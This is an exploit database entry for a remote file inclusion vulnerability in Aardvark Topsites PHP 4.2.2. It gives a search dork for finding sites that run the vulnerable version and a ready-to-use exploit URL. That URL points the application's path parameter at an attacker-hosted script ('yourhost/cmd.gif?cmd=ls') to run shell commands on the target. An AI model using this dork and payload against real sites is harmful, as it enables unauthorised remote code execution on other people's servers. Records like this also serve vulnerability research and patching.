id: 387
date: 04/29/2006
title: Aardvark Topsites PHP <= 4.2.2 (path) Remote File Inclusion Vuln
author: [Oo]
cves: 

================================================================
Aardvark Topsites PHP <= 4.2.2 (path) Remote File Inclusion Vuln
================================================================




Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
URL: http://www.aardvarktopsitesphp.com/
Dork: "Powered By Aardvark Topsites PHP 4.2.2"

Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls



#  0day.today [2023-03-22]  #